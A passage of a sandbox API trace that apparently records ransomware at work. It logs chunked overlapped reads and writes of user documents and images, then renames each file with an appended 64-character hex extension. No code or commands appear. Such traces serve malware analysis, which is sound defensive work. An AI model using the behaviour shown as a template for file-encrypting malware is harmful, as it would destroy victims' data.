lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.768] WriteFile (in: hFile=0x598, lpBuffer=0x76b0140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7690008) returned 1 [0165.770] RtlInterlockedCompareExchange64 () returned 0x0 [0165.770] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | 
out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.781] ReadFile (in: hFile=0x5e4, lpBuffer=0x7400180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048 | out: lpBuffer=0x7400180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x73e0048) returned 1 [0165.781] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.792] ReadFile (in: hFile=0x304, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0165.793] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0165.974] NtQueryObject (in: Handle=0x5b8, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0165.975] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx", lpString2=".04928C5ACBA00CC2ADC61DC76FE3A47BE5E84DCEC0BF1775937211F8D0B6B30C" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx.04928C5ACBA00CC2ADC61DC76FE3A47BE5E84DCEC0BF1775937211F8D0B6B30C") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx.04928C5ACBA00CC2ADC61DC76FE3A47BE5E84DCEC0BF1775937211F8D0B6B30C" [0165.975] GetProcessHeap () returned 0x270000 [0165.975] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 
0x741c578 [0165.975] NtSetInformationFile (FileHandle=0x5b8, IoStatusBlock=0x723f8dc, FileInformation=0x741c578, Length=0x122, FileInformationClass=0xa) returned 0x0 [0165.992] CloseHandle (hObject=0x5b8) returned 1 [0165.994] GetProcessHeap () returned 0x270000 [0165.996] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0165.996] RtlInterlockedCompareExchange64 () returned 0x3 [0165.996] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.406] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0166.407] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg", lpString2=".A2838672BA355DDDECC6CD31D47EC10BB3774435A8BE29DCA39A85FFBFCB9E5A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg.A2838672BA355DDDECC6CD31D47EC10BB3774435A8BE29DCA39A85FFBFCB9E5A") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ueq NoJbA.jpg.A2838672BA355DDDECC6CD31D47EC10BB3774435A8BE29DCA39A85FFBFCB9E5A" [0166.407] GetProcessHeap () returned 0x270000 [0166.407] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x110) returned 0x42675f8 [0166.408] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x42675f8, Length=0x110, FileInformationClass=0xa) returned 0x0 [0166.409] CloseHandle (hObject=0x5ac) returned 1 [0166.410] GetProcessHeap () returned 0x270000 [0166.411] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.411] RtlInterlockedCompareExchange64 () returned 0x1 [0166.411] 
GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.416] WriteFile (in: hFile=0x5ac, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0166.417] RtlInterlockedCompareExchange64 () returned 0x0 [0166.417] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.848] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.849] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods", lpString2=".FFD39BD055F9221009AED28AB5373C5CF629ADF0063BE2ED83CDBF4EEBA50361" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods.FFD39BD055F9221009AED28AB5373C5CF629ADF0063BE2ED83CDBF4EEBA50361") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\sOHIcmDO58yppCBHY4.ods.FFD39BD055F9221009AED28AB5373C5CF629ADF0063BE2ED83CDBF4EEBA50361" [0166.849] GetProcessHeap () returned 0x270000 [0166.849] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x13c) returned 0x42fb608 [0166.849] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x42fb608, Length=0x13c, FileInformationClass=0xa) returned 0x0 [0166.852] CloseHandle (hObject=0x598) returned 1 [0166.853] 
GetProcessHeap () returned 0x270000 [0166.855] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.855] RtlInterlockedCompareExchange64 () returned 0x1 [0166.855] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.859] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.862] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.864] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.865] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt", lpString2=".CAB457B9228624208E8BCE4F249321F53A30AB9F81B494407F36A053E385E675" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt.CAB457B9228624208E8BCE4F249321F53A30AB9F81B494407F36A053E385E675") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt.CAB457B9228624208E8BCE4F249321F53A30AB9F81B494407F36A053E385E675" [0166.865] GetProcessHeap () returned 0x270000 [0166.865] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x126) returned 0x741d550 [0166.865] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x741d550, Length=0x126, 
FileInformationClass=0xa) returned 0x0 [0166.867] CloseHandle (hObject=0x598) returned 1 [0166.868] GetProcessHeap () returned 0x270000 [0166.870] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.870] RtlInterlockedCompareExchange64 () returned 0x1 [0166.870] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.880] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.880] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.883] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0166.884] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx", lpString2=".B0986AC744A548A5E983291801FE83A46476ED8B6A52D9F1388CAAE1FFCBE642" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx.B0986AC744A548A5E983291801FE83A46476ED8B6A52D9F1388CAAE1FFCBE642") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx.B0986AC744A548A5E983291801FE83A46476ED8B6A52D9F1388CAAE1FFCBE642" [0166.884] GetProcessHeap () returned 0x270000 [0166.884] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x741d688 [0166.885] 
NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x741d688, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0166.887] CloseHandle (hObject=0x5ac) returned 1 [0166.889] GetProcessHeap () returned 0x270000 [0166.890] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.890] RtlInterlockedCompareExchange64 () returned 0x1 [0166.890] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.896] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.896] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.898] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0166.900] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx", lpString2=".17186F2B95A55ACB28CBB4F3C66D94649F5D9DCA04D3112C126528020D0C617D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx.17186F2B95A55ACB28CBB4F3C66D94649F5D9DCA04D3112C126528020D0C617D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx.17186F2B95A55ACB28CBB4F3C66D94649F5D9DCA04D3112C126528020D0C617D" [0166.900] GetProcessHeap () returned 0x270000 [0166.900] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f8e48 [0166.900] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x42f8e48, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.903] CloseHandle (hObject=0x5ac) returned 1 [0166.904] GetProcessHeap () returned 0x270000 [0166.905] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.905] RtlInterlockedCompareExchange64 () returned 0x1 [0166.905] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.910] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x1c00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.910] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.912] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0166.913] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx", lpString2=".91225E8ECE3295BEC1FFB3D1B7D293453C815BA879D3B04290D5A3A3436C8E77" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx.91225E8ECE3295BEC1FFB3D1B7D293453C815BA879D3B04290D5A3A3436C8E77") 
returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx.91225E8ECE3295BEC1FFB3D1B7D293453C815BA879D3B04290D5A3A3436C8E77" [0166.913] GetProcessHeap () returned 0x270000 [0166.914] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42f8f70 [0166.914] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x42f8f70, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0166.916] CloseHandle (hObject=0x5ac) returned 1 [0166.923] GetProcessHeap () returned 0x270000 [0166.924] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.924] RtlInterlockedCompareExchange64 () returned 0x1 [0166.924] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.929] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.940] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.942] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x74c20b8, ReturnLength=0x723f8ec) returned 0x0 [0166.943] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx", lpString2=".72DD56B21B1D6869E49A0A774E11F9F9F92978A0CACFBF5B00CF4B1D18C1A771" | out: 
lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx.72DD56B21B1D6869E49A0A774E11F9F9F92978A0CACFBF5B00CF4B1D18C1A771") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx.72DD56B21B1D6869E49A0A774E11F9F9F92978A0CACFBF5B00CF4B1D18C1A771" [0166.943] GetProcessHeap () returned 0x270000 [0166.943] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x42f9098 [0166.943] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x723f8dc, FileInformation=0x42f9098, Length=0x118, FileInformationClass=0xa) returned 0x0 [0166.945] CloseHandle (hObject=0x5ac) returned 1 [0166.946] GetProcessHeap () returned 0x270000 [0166.947] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.948] RtlInterlockedCompareExchange64 () returned 0x1 [0166.948] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.953] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.953] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.955] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.957] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc", 
lpString2=".6E461DC463F045B418529AA4F0A2AC98B7E3D39B0881F8A8C03FE7A4EBA1FD08" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc.6E461DC463F045B418529AA4F0A2AC98B7E3D39B0881F8A8C03FE7A4EBA1FD08") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc.6E461DC463F045B418529AA4F0A2AC98B7E3D39B0881F8A8C03FE7A4EBA1FD08" [0166.957] GetProcessHeap () returned 0x270000 [0166.957] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12a) returned 0x741d7c0 [0166.957] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x741d7c0, Length=0x12a, FileInformationClass=0xa) returned 0x0 [0166.959] CloseHandle (hObject=0x598) returned 1 [0166.960] GetProcessHeap () returned 0x270000 [0166.961] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.961] RtlInterlockedCompareExchange64 () returned 0x1 [0166.961] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.966] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.966] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.969] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.970] 
lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx", lpString2=".3BA170F0FEED52985A04A9B09FA46296B1757683F1C12DEDBBAA6CA7D4473C06" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx.3BA170F0FEED52985A04A9B09FA46296B1757683F1C12DEDBBAA6CA7D4473C06") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx.3BA170F0FEED52985A04A9B09FA46296B1757683F1C12DEDBBAA6CA7D4473C06" [0166.970] GetProcessHeap () returned 0x270000 [0166.970] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x4263300 [0166.970] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x4263300, Length=0x132, FileInformationClass=0xa) returned 0x0 [0166.972] CloseHandle (hObject=0x598) returned 1 [0166.973] GetProcessHeap () returned 0x270000 [0166.974] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.974] RtlInterlockedCompareExchange64 () returned 0x1 [0166.974] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.979] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.979] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.981] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x76900b8, 
ObjectInformationLength=0x10004, ReturnLength=0x723f8ec | out: ObjectInformation=0x76900b8, ReturnLength=0x723f8ec) returned 0x0 [0166.982] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc", lpString2=".E5427B1DA88344CA26B393462767E1829EA472AD39D3F8E617E7008138354B24" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc.E5427B1DA88344CA26B393462767E1829EA472AD39D3F8E617E7008138354B24") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc.E5427B1DA88344CA26B393462767E1829EA472AD39D3F8E617E7008138354B24" [0166.982] GetProcessHeap () returned 0x270000 [0166.982] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x130) returned 0x741d8f8 [0166.982] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x723f8dc, FileInformation=0x741d8f8, Length=0x130, FileInformationClass=0xa) returned 0x0 [0166.984] CloseHandle (hObject=0x598) returned 1 [0166.985] GetProcessHeap () returned 0x270000 [0166.987] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0166.987] RtlInterlockedCompareExchange64 () returned 0x1 [0166.987] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0) returned 1 [0166.991] ReadFile (in: hFile=0x598, lpBuffer=0x76b0140, nNumberOfBytesToRead=0x7200, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008 | out: lpBuffer=0x76b0140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7690008) returned 1 [0166.992] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, lpOverlapped=0x723f8f0, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x723f8f8, lpCompletionKey=0x723f8f4, 
